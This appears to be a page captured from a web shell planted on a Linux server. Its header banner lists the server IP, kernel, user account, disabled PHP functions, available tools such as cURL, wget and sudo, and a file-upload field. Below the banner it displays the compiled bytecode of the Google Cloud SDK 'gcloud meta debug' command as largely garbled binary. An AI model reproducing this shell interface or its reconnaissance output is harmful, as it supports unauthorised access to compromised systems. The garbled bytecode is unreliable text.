| Server IP : 35.236.43.222 / Your IP : 216.73.216.143 Web Server : Apache System : Linux order-form-vm-001 5.10.0-37-cloud-amd64 #1 SMP Debian 5.10.247-1 (2025-12-11) x86_64 User : deploy ( 1002) PHP Version : 8.1.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /usr/lib/google-cloud-sdk/lib/surface/meta/__pycache__/ |
Upload File : |
�
��� � �l � d Z ddlmZ ddlmZ ddlmZ ddlmZ ddlmZ G d� dej � � Z
d S )
z The `gcloud meta debug` command.� )�absolute_import)�division)�unicode_literals)�base)�debugc �. � e Zd ZdZed� � � Zd� ZdS )�Debugan Run an interactive debug console with the Cloud SDK libraries loaded.
This command runs an interactive console with the Cloud SDK libraries loaded.
It's useful for:
* Manually testing out an API.
* Exploring available Cloud SDK core libraries.
* Debugging specific problems.
It comes with many utilities pre-loaded in the environment:
* All API clients loaded with one command (`LoadApis()`). Then, for instance,
`appengine` refers to the App Engine API client.
* Many common Cloud SDK imports pre-imported (e.g. core.util.files,
console_io, properties).
Use `dir()` to explore them all.
c � � | � dt t j � � � � � dd�� � d S )Nz--mode�pythonz!The debug console mode to run in.)�choices�default�help)�add_argument�sortedr �CONSOLES�keys)�parsers �lib/surface/meta/debug.py�Argsz
Debug.Args. sI � �
����&���!4�!4�!6�!6�7�7��
0� � 2� 2� 2� 2� 2� c �B � t j |j � � d S )N)r r �mode)�self�argss r �Runz Debug.Run4 s � � �N�4�9������r N)�__name__�
__module__�__qualname__�__doc__�staticmethodr r � r r r r sH � � � � � �� �( �2� 2� �<�2�
� � � � r r N)r �
__future__r r r �googlecloudsdk.callioper �googlecloudsdk.command_lib.metar �Commandr r! r r �<module>r&